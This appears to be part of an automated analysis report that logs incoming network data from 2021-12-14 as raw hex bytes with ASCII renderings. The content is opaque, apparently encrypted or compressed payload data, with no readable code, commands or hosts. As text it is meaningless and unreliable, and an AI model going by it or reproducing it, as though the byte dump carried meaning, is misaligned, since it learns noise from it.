42 a1 ef 48 cc 10 42 38 2e f9 75 11 c1 f1 31 15 ae 3e 3d 58 d2 a3 4a 8c f2 6f 5d d3 c5 fe 08 d7 5e cc e0 e8 29 43 8a e5 1f 4b f6 5f e1 97 56 c8 6d 1a c3 6c 72 38 f9 7e 1a cb 2a 2e
                                                          Data Ascii: 2Tj`U(yJNC+_g"knat'oK8y+>Ax%E}"0@]B..u0^VEflB.]VG(9i={M>tz,K0Qn+p['a$wt&a]jY11^+pBHB8.u1>=XJo]^)CK_Vmlr8~*.
                                                          2021-12-14 13:10:57 UTC122INData Raw: e1 e4 d0 43 ff 3e c0 a6 36 ad 04 ff 8a bd 5a c3 fa b6 3e 87 d4 22 55 41 8e d4 49 60 db fc 2a b2 b2 33 f2 f6 80 de 7a 16 8a 5b 03 d5 4d b5 87 1d 2a 0f bb 23 2b 20 11 a4 0d 33 51 f9 ac cb e9 b1 32 71 02 cd 19 31 5f a6 04 a5 16 ac 7d 1b ef e0 1d 61 0e c6 fa c5 5e 77 42 c9 93 ac 45 c1 92 4c 7e 15 35 08 ca 2e 19 ad c6 3a 50 42 58 56 8b 18 ee 63 6b 3a 5e b4 11 83 32 d7 6f 69 f9 10 eb 34 ef 23 0f a3 cb be eb e4 40 fa bf d9 43 64 46 bf 24 90 3f b6 61 f3 11 6a f8 69 ec 10 f8 ef 46 28 15 bb 1d da bb f2 09 7f 0b 31 63 20 c4 78 f4 1b 09 1b 17 07 90 a9 4d b6 c7 5b 21 e8 3a f9 01 b8 89 8d 1b 14 9e 07 00 60 fe ab 1f 11 87 49 84 f0 b8 54 4b ae 0c 8b e6 a4 d2 cd c3 ed 81 4c 24 a4 66 d7 c4 bb dd 65 2b 8b 14 ef db a6 b0 29 dc 69 4d c3 70 84 72 58 55 be 5b fc 48 19 84 82 e6
                                                          Data Ascii: C>6Z>"UAI`*3z[M*#+ 3Q2q1_}a^wBEL~5.:PBXVck:^2oi4#@CdF$?ajiF(1c xM[!:`ITKL$fe+)iMprXU[H
                                                          2021-12-14 13:10:57 UTC123INData Raw: 27 9a 4a 10 63 03 aa 4f 2c 70 83 d8 bd cf 7c 36 ea 52 3b 67 ce de e9 fe 8a 65 d3 45 0e b8 20 7d ce 39 4c 00 b6 04 4b da 7a fa 80 e2 e0 3c 60 12 5e 1f 82 b4 30 7c de 5c d8 78 4f 9f ea 9a 3e b7 2b e0 c0 09 67 3c f0 2a 13 c8 95 d5 79 2d 19 3f 0d 04 65 24 68 e9 84 8c 61 93 d2 b8 3e 89 d7 d3 ed 9c 47 de 9c f3 76 01 72 c4 af 86 d7 76 74 e9 33 d4 42 f7 8b c7 8c 2c aa 0d c2 da ad 65 e8 e2 0a 48 f1 78 f6 b0 54 60 0a 02 6b 42 28 77 0d 9e 53 00 ae 3e b4 ee 4d 1a cd d7 e9 2e 04 f8 e1 cb 9e 45 bc b0 c7 80 be 78 5e 23 5e 20 5e 29 80 d0 03 6d 30 da 4a 94 9e d9 8f c0 38 84 eb 88 0f c5 3e 60 b4 41 4f 79 8a 2b c9 e3 1e f4 73 d2 bc c4 e6 8a b0 2e 6a 03 22 64 19 22 d7 0a e7 31 91 f3 e1 87 2f d4 9f 73 d8 70 fc 5d dc 11 47 3a 88 ed 4a fa 36 26 e9 16 84 38 6a 44 3a a1 4a 86 e3
                                                          Data Ascii: 'JcO,p|6R;geE }9LKz<`^0|\xO>+g<*y-?e$ha>Gvrvt3B,eHxT`kB(wS>M.Ex^#^ ^)m0J8>`AOy+s.j"d"1/sp]G:J6&8jD:J
                                                          2021-12-14 13:10:57 UTC124INData Raw: 0e 6f 07 14 ec b9 34 ed 73 17 14 2f e4 3a 3b 28 b7 35 be 15 e4 41 02 bc bd cd 0d d3 22 98 44 18 5d c9 86 e6 9f 24 6a c7 38 d3 a2 f7 8d 11 c2 8a ed 51 da 04 b7 12 8e aa b1 55 41 84 c1 52 73 cc e5 3a a5 ad 06 0c f7 ac c8 6b 06 88 6e 2b 29 58 ff 98 3b 3b 1a b8 4f 47 3e 0d 5e 0e 1b 38 94 bc b5 a1 9a 32 66 23 da 31 c7 5d a6 02 be 1b b3 71 0a 06 f5 41 76 12 3a f9 97 6d 75 51 d8 f3 c1 53 c1 87 59 b1 40 cb 09 e4 0c 04 94 a7 32 78 42 46 4f 92 72 93 73 7c 21 52 5e ee ae 2b 38 69 72 f7 53 43 37 ec a7 ab d7 54 af f8 f7 42 e9 d3 46 66 9a 43 bb 60 83 2f ad 17 a4 3c 6f fc 6c d2 3c 81 90 41 00 fa bb 66 50 d5 d4 0f 57 e0 2c 46 39 d7 6c 1b 0d 00 eb e8 0d bb 95 48 9f c6 d5 90 e6 3c f9 01 b6 98 88 7f 99 8c 10 04 59 b1 b6 3e e5 fb e4 8e 83 9e 52 5d aa 64 1a f8 86 c5 d8 b8 7e
                                                          Data Ascii: o4s/:;(5A"D]$j8QUARs:kn+)X;;OG>^82f#1]qAv:muQSY@2xBFOrs|!R^+8irSC7TBFfC`/<ol<AfPW,F9lH<Y>R]d~
                                                          2021-12-14 13:10:57 UTC125INData Raw: e2 88 59 cc 34 ea f4 ac af e7 d4 10 a1 6e 58 0e 58 33 56 9e 93 d6 df 5b 7e 81 f7 ec 37 e7 bf 5b 66 24 d0 31 e5 d3 15 72 14 9b c9 0b 5d 8e ed a8 c1 6e 20 d1 1c 17 65 c4 b7 34 a9 f4 fa c1 48 1b af d5 a4 e2 33 6c 0c c6 fd 53 f2 5d 97 7c e5 ca 6c 09 e4 8e 1d 86 a5 c5 a5 f2 56 f8 74 3f 62 f2 b2 19 da d5 e7 ea 55 0a aa e0 27 78 28 0e f0 52 30 50 f2 10 34 70 47 bc c5 86 8a 7f d6 59 c4 a7 82 b8 29 f1 06 64 e0 99 c4 65 60 02 da a0 aa eb 7b 5c f3 1b 8e 3a 7d 81 b4 aa 30 30 2e fc c1 9a 6b ff c6 3d 47 d9 53 e5 a0 43 46 40 50 f7 43 2e 5b 3c 95 c9 23 ab d9 90 f1 4e 6a b1 ca e5 00 38 ea f0 c6 9c 0b c7 29 c0 a8 94 65 54 bf 53 e6 50 0f 95 b5 3a 0b 2f d7 73 a9 9f b6 a3 e8 66 fc 74 98 1f ae 39 6a 2e 6e bc 7d 89 1c f5 fc 71 e7 48 eb 96 fc e0 a0 d8 8e f3 13 28 77 d0 3d 47 3e
                                                          Data Ascii: Y4nXX3V[~7[f$1r]n e4H3lS]|lVt?bU'x(R0P4pGY)de`{\:}00.k=GSCF@PC.[<#Nj8)eTSP:/sft9j.n}qH(w=G>
                                                          2021-12-14 13:10:57 UTC127INData Raw: 3d f3 89 96 12 df ee 0b 95 38 e0 42 bd fe 3e bd f8 1f 5b 61 85 04 25 42 72 bb a4 92 44 e4 aa f2 86 f4 4e 20 51 69 6a 7f 90 00 e8 6c 29 fa 18 c9 35 06 c9 88 15 31 63 f6 41 1d ad 9e e7 05 0d 34 97 06 51 c4 c8 8c ef 94 1b d8 da 15 dd 8e 36 b8 37 71 88 ac 4d c4 2c 9a 10 8e ac 9b 3f 3f 1d d9 53 77 d3 ca a1 80 80 18 2a e8 9a f2 ca 04 89 34 31 ff 60 b1 98 3d 13 72 c5 ab 3d 3f 09 45 3b 85 60 c5 b3 93 ba 87 12 d6 11 de 31 34 75 8b 00 b6 1c 99 0a 76 61 e1 0c 72 0d 00 61 cc 75 7b 77 c3 b6 9f f4 c3 83 5b 7a 25 e6 0b e6 22 3a fe d9 a1 51 42 43 50 a1 95 cb 5f 72 03 4e 73 30 04 3f c6 68 64 d9 52 6c 35 e9 03 76 d4 4d af f8 f7 5f d1 32 e3 4a 94 61 8c 02 a1 9e a5 6a db 20 47 d5 6d c4 38 d0 85 3e 99 ff b9 19 cf ef 4e 2e 52 03 08 59 08 f3 c0 e7 0c 16 0c c1 2b be b9 63 b7 ac
                                                          Data Ascii: =8B>[a%BrDN Qijl)51cA4Q67qM,??Sw*41`=r=?E;`14uvarau{w[z%":QBCP_rNs0?hdRl5vM_2Jaj Gm8>N.RY+c
                                                          2021-12-14 13:10:57 UTC128INData Raw: 4b e4 9e cc 0c dc 50 20 df 62 03 32 27 3d 3c 0b 21 51 70 fb 3c 87 ae 9c ba c7 e9 2f 6a 6b 32 31 47 7b f4 5d 80 7d e5 05 e3 8f a4 02 e1 d4 16 94 31 0e ba 5b 33 54 ac 67 8d 6b 50 58 9d f0 97 be ea bf 56 40 3d 9e 4b 12 4e 14 72 0f a2 7b 03 72 85 cd 9b b4 05 a6 c3 34 3e 78 a1 2b 3b d2 84 45 df 2d 3f 1c 4b 81 cf 25 62 3b db d5 4f f0 1e eb e5 e2 e0 3e 68 1b 15 38 af b1 79 9f b9 7c 71 6b 20 4e f7 8a 1c f5 d7 e1 c6 25 1e 4d 78 26 7c 30 8b b2 e5 1e 5b e0 29 1b 08 6b 2b ec 84 8a 62 d4 2e b8 3e 85 92 43 92 05 40 cd 96 fd 10 e5 1b e8 a0 a4 d9 11 7c 31 35 d4 44 fb 8f 9c 83 2c aa 0d fb a0 c2 ec e1 8d 26 55 98 e4 c2 8d 4b 4a 3d 47 4e 91 2a 5f 23 87 7b 2b 84 d5 b0 c4 29 0b 70 d4 e9 2c 0a 82 6a e5 9b 66 9f af ab 88 48 7e 5e 25 69 ee 74 04 88 bf 23 45 5e a2 c2 85 9d b2 ba
                                                          Data Ascii: KP b2'=<!Qp</jk21G{]}1[3TgkPXV@=KNr{r4>x+;E-?K%b;O>h8y|qk N%Mx&|0[)k+b.>C@|15D,&UKJ=GN*_#{+)p,jfH~^%it#E^
                                                          2021-12-14 13:10:57 UTC129INData Raw: 58 03 63 93 9e 8a 2c b7 fd b9 8a b7 8f 2a 1b 65 31 e0 b4 f1 1a a9 c9 8f 38 23 a6 b7 c4 f5 bc e5 a5 19 d9 3d f7 b2 31 3f dd ee 97 9a 7b 8c fd 9c 71 3a a2 cb a5 20 4b 8a 22 25 5d 7a 13 a4 92 42 d1 22 a4 32 f7 4e 22 5b 97 14 e6 91 9a c9 5e 0c 46 1d 74 3a 20 d6 9c bf b9 61 f6 5b 2a 8a b4 ca 01 27 b0 c3 f5 2e 5d cd ac 7a 8b 2e 42 65 1d fe b9 0f ad 86 e8 8a ac 6d 54 03 b7 12 94 82 9c 57 41 82 f2 d1 0d 55 fd 3b a1 8d 84 0c f7 ac 48 4e 2b 98 12 09 45 4d b3 98 1b ab 1f bb 32 24 17 20 58 0c 19 6f 6a c3 2c a4 b0 36 55 80 de 31 2d c7 83 2f a7 3c 93 f3 08 f8 e0 2c e2 15 38 fb f4 70 58 53 dc 88 95 d0 bf 1a 5a 61 09 eb 9d e6 24 10 0e 82 15 41 64 67 db 98 0f ee 52 e7 22 51 4a 0e 87 10 c4 68 7e db fd 10 ac ee 29 18 8a 41 ae f8 f3 da ce 85 d7 41 ba d2 93 38 81 0f 04 6d db
                                                          Data Ascii: Xc,*e18#=1?{q: K"%]zB"2N"[^Ft: a[*'.]z.BemTWAU;HN+EM2$ Xoj,6U1-/<,8pXSZa$AdgR"QJh~)AA8m
                                                          2021-12-14 13:10:57 UTC130INData Raw: e7 8a be d0 ce 12 28 73 55 14 f0 09 cb 00 22 cd 94 79 f0 3a 86 66 cf b9 e6 60 e0 06 56 2a 2c dc 0b 88 ca d9 12 30 0b 38 2b 70 a0 84 67 94 c5 53 ec fb e2 fa 28 cb 40 41 e7 f7 26 6a b3 f3 0b 65 7f d9 9f 04 7f e0 6c 3a 63 7a 5a d0 61 5b 3d f1 e5 0c 22 f3 6f 7a ac 08 ff 1a 53 53 ac 73 22 d1 c0 0e ca 24 c4 f8 6c c3 96 7b a3 58 e5 4b 75 aa f0 99 65 87 b6 17 f3 9a ce 46 59 a4 10 b9 9d 98 db 26 d5 5f e0 b9 73 6a f6 c7 5b e4 3f 8f 9d 99 9e e4 2f 72 b1 9e ac 2c b7 fd 03 ed 92 9e 0c 20 c3 1c e2 b4 d7 6a 2c b7 16 23 0b 8f 95 6d f3 96 63 41 a5 f5 2c d5 b2 17 3f dd ee 2d f8 5e 9e db a6 d6 17 a0 cb 83 54 ce f4 bb 3b 71 56 1e 0c 92 44 fb 3a ff 86 e7 68 06 d1 07 14 e6 b1 4b e4 73 1d 7e 15 c9 38 20 d0 96 b7 c0 f8 f7 41 06 87 1d ca 07 0d a8 98 41 3e 7b e9 27 eb 8b 2e 62 ac
                                                          Data Ascii: (sU"y:f`V*,08+pgS(@A&jel:czZa[="ozSSs"$l{XKueFY&_sj[?/r, j,#mcA,?-^T;qVD:hKs~8 AA>{'.b
                                                          2021-12-14 13:10:57 UTC131INData Raw: 52 63 72 8f 14 e9 02 9c 72 65 9d c2 c1 02 b6 ac de 21 79 9a 8a 04 3b ec 1a 00 71 f6 97 16 c2 84 65 89 a9 1c 28 d2 a9 1f 9f d9 4a c1 da c3 66 b3 7e 1e 7c 47 37 ce aa d7 54 b9 b0 19 f0 ed 96 8f 04 cf 7e 54 fa 08 fb c7 47 44 b3 6a 3b 27 f5 86 18 c9 e7 01 5d fa 5a 58 1c 8a 8f 7f 28 55 b0 a5 8b cc 5a 29 c8 0c ae 2d b9 13 49 c3 83 cd 4a a5 4d 0e 1f 2d 82 44 0a fa 8e a9 a9 80 f8 ec ac 46 41 90 5c 0b 45 a7 00 7e 02 ca 1e 4a f9 9a 76 00 0f 52 9d 30 5e ae f6 54 b0 ec 78 9f b0 af 10 b9 06 c4 d5 4d 09 66 65 9c c2 5f cb 44 a7 d8 88 4d 1d ff 2b 1e 35 7d 05 e9 25 d1 14 9a 2a 4f 0c 14 18 51 17 7a 25 4e 55 cc 1e ad 83 98 90 47 bd d8 15 f2 37 11 92 64 97 c7 3f 75 c7 31 da cc 55 82 e5 d4 36 b8 33 26 97 46 15 7a ab 0b f3 f4 7b de e7 76 f2 24 cb b2 8b 66 22 fa f1 be 67 06 54
                                                          Data Ascii: Rcrre!y;qe(Jf~|G7T~TGDj;']ZX(UZ)-IJM-DFA\E~JvR0^TxMfe_DM+5}%*OQz%NUG7d?u1U63&Fz{v$f"gT
                                                          2021-12-14 13:10:57 UTC133INData Raw: 09 6f b2 25 6f 2d f4 76 86 9d b0 8f 40 46 1b ec 99 1b 8a d4 61 b4 4b 0b 53 82 12 d8 c3 ec fe 60 c6 b4 10 eb 8a ba e7 42 3f 2a 73 c9 1b 5f 65 74 21 86 c9 b4 8a d0 2b 8e fc ea 8b fe 6e ed f7 56 2c 06 7a 98 1c cb d9 0b 38 83 3a 2b 76 10 23 34 1f e2 73 4d db 16 fa 08 d1 d2 64 ca f9 0f 62 6a f1 0b 63 75 ab ec 9d 7e fa 40 37 c7 7a 5c fa 79 00 89 e2 c3 28 a4 06 6f 7a 8c bb d2 37 42 6a 85 ae 0f d3 c0 28 18 af ba 61 77 eb bf 59 04 5e cf c9 91 16 dc 8b 47 87 e7 17 f3 9a 74 51 7c b5 36 86 7b b0 f6 24 f5 a5 c7 3b 0d e9 df ea 5d c4 91 a5 1f e7 9d c0 02 67 b7 49 04 2c b7 67 06 82 8b b8 2c cc eb 31 e0 94 d1 4e ae c9 96 0a 26 89 b5 c2 d9 14 1d 42 81 d8 39 d3 6a be 3f dd 74 28 92 47 b8 fb 44 fe 3a a2 eb 86 70 4c 8a 3f 12 5c 50 3e a0 b8 c6 85 39 db ab f2 6e df 7b 07 14 7c
                                                          Data Ascii: o%o-v@FaKS`B?*s_et!+nV,z8:+v#4sMdbjcu~@7z\y(oz7Bj(awY^GtQ|6{$;]gI,g,1N&B9j?t(GD:pL?\P>9n{|
                                                          2021-12-14 13:10:57 UTC134INData Raw: a8 e6 8c 95 47 93 24 a9 02 a5 6a dd 17 e9 86 f6 c5 3e fe cf 59 01 fe b9 87 f5 f9 c6 2d 5f 14 2f 46 33 f3 89 ea 0c 16 0a f9 2e 91 bb 65 9b e8 d9 59 02 bf f8 05 92 80 8b 04 1b 17 35 2d 60 cf 94 24 ee 86 65 af 82 8a 56 4b b6 37 b6 fb 86 c7 f0 45 82 0f 52 0c 5e 47 e0 cf aa d7 ee 18 97 0b d6 d2 ae a6 29 cd 5e 5b c0 8e 85 41 67 6c 9a 48 f6 21 df 00 fc 75 cb 13 7f fa 8b 59 1c 8a 35 fd 0f 47 96 9a b5 e5 77 2b e8 20 94 ab c7 95 41 eb aa ef 84 a3 67 88 fb 91 ae 56 28 fa 5d a8 a9 80 42 00 8b 54 67 af 63 22 68 a5 20 4b 38 4c 60 cc eb b2 5f 22 c0 54 b7 b2 ba 12 da 46 92 ec a9 9e b0 af aa 77 21 d5 f3 72 34 4f 48 9e e2 1f f1 c2 d9 5a a1 60 1b df fd 34 b3 03 06 cd 08 c7 12 a5 fb 4f 0c 8e 1d 72 0e 5c 05 4e 71 e4 33 8f c8 8e ba c1 dc 4e 3c df 31 31 45 4e 15 b9 3c 51 ea 27
                                                          Data Ascii: G$j>Y-_/F3.eY5-`$eVK7ER^G)^[AglH!uY5Gw+ AgV(]BTgc"h K8L`_"TFw!r4OHZ`4Or\Nq3N<11EN<Q'
                                                          2021-12-14 13:10:57 UTC135INData Raw: 6e d8 0b 72 32 ba 73 39 87 d5 b6 ce 9f 64 e9 d5 f2 00 38 ea f0 c6 9c ef c7 29 c0 a8 94 5a 1e 24 76 cb c6 0c a7 ad 03 4f 70 dd 5b 84 bd 6b b4 c2 38 9d c9 b1 32 a8 26 67 9e cd ef ef ae 03 fa c3 5f ff 60 c6 0e d9 cb 98 9c d0 2b 13 28 73 ef 30 cf 1b ed 3f 95 e5 b9 7b d0 2d a4 e0 b1 3f ee 48 c9 24 14 2d 06 5a ef 34 e6 cb 30 30 ec 39 2b 70 1a b5 58 86 e3 6c 6d d3 cf f8 08 d7 62 c7 99 71 28 42 9a d1 48 62 55 5f 7b b8 53 f2 4e 3a 86 7b 5a d0 db 46 02 e3 c3 33 9b db 42 78 8c 27 dd 9c 2d d5 a4 5b 0b f3 84 09 e0 a2 20 44 40 d1 b4 7b 40 59 e5 4b cf d8 cf 8b 43 b8 35 3f de 98 ee 72 7b 22 6e 3f 8c b0 f2 04 90 58 ca 3b 97 d6 da d5 79 e4 d2 8e 9d 99 24 ba 10 63 97 a1 27 04 9a ff 23 a9 b0 18 72 a2 ea 31 e4 94 97 41 ae c9 15 07 26 99 93 e4 b5 97 63 db a0 46 2f f3 92 a1 1b
                                                          Data Ascii: nr2s9d8)Z$vOp[k82&g_`+(s0?{-?H$-Z4009+pXlmbq(BHbU_{SN:{ZF3Bx'-[ D@{@YKC5?r{"n?X;y$c'#r1A&cF/
                                                          2021-12-14 13:10:57 UTC136INData Raw: b9 a5 38 56 68 c5 31 01 0e ee 76 5c 43 50 4a 10 35 18 eb 79 5e d1 19 6f 35 ef 09 4b bf d4 ae e5 db 6d e9 a8 c0 4d 18 39 0a 39 81 2b 87 0d da 3d 6f 62 4a e9 2f dc cf 27 01 fe b9 3d 8e c1 d4 0b 61 25 03 44 33 d5 52 67 72 8f 14 e9 02 9c d1 64 9d c2 c1 02 b6 af de 21 da 9b 8a 04 3b eb 05 00 71 f7 9c 13 ed 86 63 a5 01 e4 cf 4a a8 1b bb 90 87 c1 da 59 d9 bb 42 2a 7a 0e fa ce aa f7 1a 28 ba 19 ea da 98 a5 29 cb 54 d0 ae 17 84 5e 42 64 dd 4b f6 27 6f a3 af fd ec 33 11 db 97 58 3c f8 ba d8 22 4f 98 97 ab e4 71 01 4a 74 1d aa c7 8e 68 a8 86 ed 84 3f 68 23 94 2e 8f 3d 2d da 40 89 df 95 d8 25 bd 6e 6c 8d 7e 25 42 23 7e e1 29 4c 64 f3 94 9b 72 20 5a 77 b0 22 e2 ab b7 47 96 cc 97 e4 a5 af 30 4d 07 ec f8 50 2a 48 62 18 bc c0 e0 c2 dd 61 e4 4c 19 df 61 3b 18 6f b9 ec 65
                                                          Data Ascii: 8Vh1v\CPJ5y^o5KmM99+=obJ/'=a%D3Rgrd!;qcJYB*z()T^BdK'o3X<"OqJth?h#.=-@%nl~%B#~)Ldr Zw"G0MP*HbaLa;oe
                                                          2021-12-14 13:10:57 UTC138INData Raw: 5f bd d2 af 82 d9 76 74 d8 33 d4 42 ce 06 ca 37 2f aa 0f f1 47 bd 75 e0 17 07 67 e3 58 c7 2d 44 6c 22 0e fc 55 2e 5f 3c 95 7b 2b 84 d5 b0 c4 c1 0b 70 d4 e9 2c 35 66 f1 c0 b6 f3 9c 9d d3 8e b0 f4 5f 25 76 eb c7 3e 8a bf 3a 7c 18 f1 59 84 9b 9c 23 bc a1 83 ed 9d 3f 25 27 61 b4 d1 b4 5b bd 25 de 6c 1f fe 60 e6 3a eb e6 8a a5 f9 42 3f 2a 73 c9 1b 5b 65 74 21 86 c9 b4 e9 d1 2b 8e fc ea 8b fd 6e ed 94 57 2c 06 7a c2 06 cb d9 09 1e 86 15 29 70 3c 8b cc f8 7a 72 49 ff c2 6b 09 d1 48 db c2 c5 3b 64 be 60 0a 63 55 7f 24 8a 7e e0 77 16 ed 57 58 d0 fd 54 92 9d 5a 2d 84 f7 4f e8 8d 21 f7 80 76 61 b4 7d 2f 41 c1 08 e0 82 6b 76 6d c3 8b 73 29 5a e5 4d c5 0d a3 12 42 a7 15 37 60 9b ee 74 cb 81 3d b7 ab 90 65 25 d5 59 ea ef 1a f3 f7 dc 77 e9 95 8f 9b b3 86 bf 9b 62 97 ba
                                                          Data Ascii: _vt3B7/GugX-Dl"U._<{+p,5f_%v>:|Y#?%'a[%l`:B?*s[et!+nW,z)p<zrIkH;d`cU$~wWXTZ-O!va}/Akvms)ZMB7`t=e%Ywb
                                                          2021-12-14 13:10:57 UTC139INData Raw: 11 9e 5c a6 02 96 22 aa 60 08 e6 c8 21 74 12 3e d1 6b 26 ec 50 dc 8a 9f e6 c0 83 5b fb 28 e6 18 c0 04 a4 95 a7 38 70 02 5e 4f 98 13 c6 5f 7e 25 57 60 92 d1 a4 c7 68 7c d1 ca 6f 35 ef b3 39 87 c5 88 d8 46 41 eb a8 e6 21 83 47 93 25 a9 02 a5 6a dd 17 ed 86 f6 c5 3e fe cf f6 01 fe b9 87 f5 f9 c5 2d 5f bb 2f 46 33 f3 35 fc 0c 16 02 c1 2b be b9 63 b7 40 25 be 9a be fc 21 05 9b 8a 04 81 a8 3d 11 57 c9 03 3f ef 86 45 c1 9a 9a 56 57 80 32 99 f9 80 eb 58 bd 65 97 53 08 7a df fa ce aa 4d 51 10 ab 3f d0 4a b4 a7 29 ed 2a 4b d0 8e 98 76 6b 46 b7 4c dc a5 8b 1f 83 ec ce 33 c2 db 97 58 86 af 82 c9 04 75 09 bb a9 e4 57 70 d1 0a 84 b7 ef a7 4a c3 81 c7 06 db d4 0f 85 0c 8f ec 2d da 40 33 8c ad c9 03 86 fc 40 8f 7e 03 09 bc 00 78 35 64 4d d1 f8 9c 58 a6 be cb 9c 30 c0 ab
                                                          Data Ascii: \"`!t>k&P[(8p^O_~%W`h|o59FA!G%j>-_/F35+c@%!=W?EVW2XeSzMQ?J)*KvkFL3XuWpJ-@3@~x5dMX0
                                                          2021-12-14 13:10:57 UTC140INData Raw: ae 32 e1 27 5c 3b 8f d5 7f 2c 5e c3 0d 04 69 61 16 96 1d 8b 79 f8 23 61 3f 83 b8 b7 c9 b1 50 eb b2 39 79 7f 3e e5 bf 99 c6 79 4b dd 1c d6 44 e2 aa 36 d0 b7 ab 0b d5 ea 60 74 e0 8d b8 6f dc 6f c1 80 99 6d 22 2e 4e 53 35 5f 23 84 7b 2b 84 d5 b0 c4 c1 0b 70 d4 e9 2c 35 35 f1 c0 b6 f3 9c 9d d3 8e b0 a7 5f 25 76 eb 4f 32 8a bf 3a 64 18 f1 59 84 9b 9c 23 bc a1 83 ed 9d 3f 74 27 61 b4 d1 b4 5b bd 25 de 3d 1f fe 60 e6 8a e7 e6 8a a5 e0 42 3f 2a 73 c9 1b 5b 65 74 21 86 c9 b4 a6 d1 2b 8e fc ea 8b fd 6e ed db 57 2c 06 7a 5b 0a cb d9 09 33 86 15 29 70 3c 8b c8 f8 7a 72 49 ff c2 1a 09 d1 48 db c2 c5 38 64 be 11 0a 63 55 7f b0 86 7e e0 71 32 e8 78 5a d6 d1 fc 6e 7a c2 2c 80 d3 8e 7b 8c 21 6d 3f 7e 5d 83 7b ee d2 c0 08 c0 f6 a1 61 6d de ba 76 06 58 e3 61 69 f1 44 8a 43
                                                          Data Ascii: 2'\;,^iay#a?P9y>yKD6`toom".NS5_#{+p,55_%vO2:dY#?t'a[%=`B?*s[et!+nW,z[3)p<zrIH8dcU~q2xZnz,{!m?~]{amvXaiDC
                                                          2021-12-14 13:10:57 UTC141INData Raw: 14 0c f7 8c 6b 77 06 89 2b 23 ff 60 b1 98 3d 13 9a c5 ab 3d 3f 09 7a 0e 1d 45 e8 27 90 88 a1 14 55 11 dc 31 2d 7d 65 1e b6 1a af 48 25 fa e0 0a 5c 94 46 62 e8 58 71 71 df 8c bf 52 5b a6 76 73 2b eb 0a e4 24 10 b4 6e 24 50 42 58 44 b0 22 ec 72 7a 0f d3 34 89 ae 3d c2 48 7c f3 7f 6e af ca 04 0d 8c f4 aa fa f3 40 cb 7c da 67 9a 5c bb 15 83 2f a1 40 5d 43 f6 f9 6f c0 1e ff ed 40 00 64 9c 30 c2 f2 f4 0e 7d 0d 2e 66 ea cf 78 e5 13 1a 3d c4 04 bc bf 4f 1b bc c2 26 9b ba d8 07 b0 9a 8a 9e 3e a0 02 26 51 ef b6 3e ef a6 80 93 83 9a 49 5d 80 32 99 f9 80 eb 58 bd 65 97 53 08 7a 60 f9 ce aa 4d 51 10 ab 3f d0 f5 b7 a7 29 ed 85 4e d0 8e 9b 76 6b 46 b7 4c dc a1 8b 1f 83 ec ce 33 73 d8 97 58 86 af 82 ca 04 75 b8 b8 a9 e4 57 28 d5 0a 84 b4 cc a2 65 c1 87 eb ae 23 33 97 84
                                                          Data Ascii: kw+#`==?zE'U1-}eH%\FbXqqR[vs+$n$PBXD"rz4=H|n@|g\/@]Co@d0}.fx=O&>&Q>I]2XeSz`MQ?)NvkFL3sXuW(e#3
                                                          2021-12-14 13:10:57 UTC143INData Raw: 39 d0 33 f4 c7 6f fa 58 97 7c e3 c0 75 68 7d 8f 02 f8 96 72 82 df 5a f4 e9 5e d7 e9 9a 30 f8 fc e3 c0 0f ee 16 cc 35 5a 14 bd d7 7f 3b 56 27 10 04 6f 54 cc c0 a9 88 79 fa 29 3c 40 1a b9 2d e8 bc 6b cf 92 e2 e2 5a 13 d7 89 a2 ec 7b 5c f5 11 f5 64 e4 80 ab f6 06 87 09 d1 cc 96 f7 9e 14 23 4a f5 5e cc a2 45 6c b8 0b 43 53 08 7f 08 9e 53 06 a6 ac 96 ee 47 6e c1 f8 eb 28 13 c2 76 be 2f 68 b9 b4 e1 84 92 7a 5e bf 53 e6 4e 0f aa 93 27 6f 30 fc 25 a4 9d b6 ba cf 10 af ef 99 19 80 a0 1f 2d 4a 91 72 8f 2e fc e3 1e 64 45 eb 86 da c6 a7 b8 f0 6a 32 a3 53 cf 31 c2 16 c5 0d 84 cd 92 53 56 55 17 67 cf a2 cf 66 cf 04 56 b6 23 77 67 37 eb f7 14 10 ae 18 b3 50 3a a1 55 8b cb 5e 4b fb e4 d0 8e af d1 40 e7 ec 09 6d 9c f1 0b f9 70 72 f3 bb 5e cf 6a 1a c5 5a ff f0 fb 7e 0f ee
                                                          Data Ascii: 93oX|uh}rZ^05Z;V'oTy)<@-kZ{\d#J^ElCSSGn(v/hz^SN'o0%-Jr.dEj2S1SVUgfV#wg7P:U^K@mpr^jZ~
                                                          2021-12-14 13:10:57 UTC144INData Raw: c8 8c ef ab 61 40 ff 38 49 8d 04 9f 31 c8 c5 ae 4d da 24 09 30 8e aa ae 71 69 a9 da 53 75 e6 7a 45 3c ac 16 08 d7 fc d0 6b 06 13 11 04 c5 6b 93 c8 39 39 18 9b d0 1e 3f 0d 45 07 37 68 ea bd b3 8f 36 4c ec 12 de 35 0d 0c a4 02 b6 80 96 4d 1a de c0 5d 74 12 38 db 04 7a 75 51 c3 94 97 7f c3 83 5d 4b 8b b5 90 e7 24 14 b4 f5 3a 50 42 dd 6a b5 1d c8 52 2e 27 51 4a 30 a8 1e c6 68 67 e9 57 43 37 ef 2f 36 2c aa 37 f9 f3 44 cb fb c4 67 9a dd b6 15 93 09 87 39 d9 3d 6f d8 70 e7 3e fa f0 54 28 d3 bb 1d d6 fe 56 75 e6 0c 2e 42 13 87 7a e5 0c 8c 30 c4 17 9a 99 31 9f c2 5b 07 a8 9d f8 01 ac b2 a7 06 1b 8b 3a 86 0f 70 b5 3e eb a6 30 8d 83 9a cc 6e 85 0d bd d9 d3 c3 da c3 dc ad 70 0c 5a 78 e3 e6 87 d5 74 3b 90 9f 8e 6b b4 a7 2d ed 28 50 d0 8e 1f 7b 6b 56 91 6a a0 25 f5 86
                                                          Data Ascii: a@8I1M$0qiSuzE<kk99?E7h6L5M]t8zuQ]K$:PBjR.'QJ0hgWC7/6,7Dg9=op>T(Vu.Bz01[:p>0npZxt;k-(P{kVj%
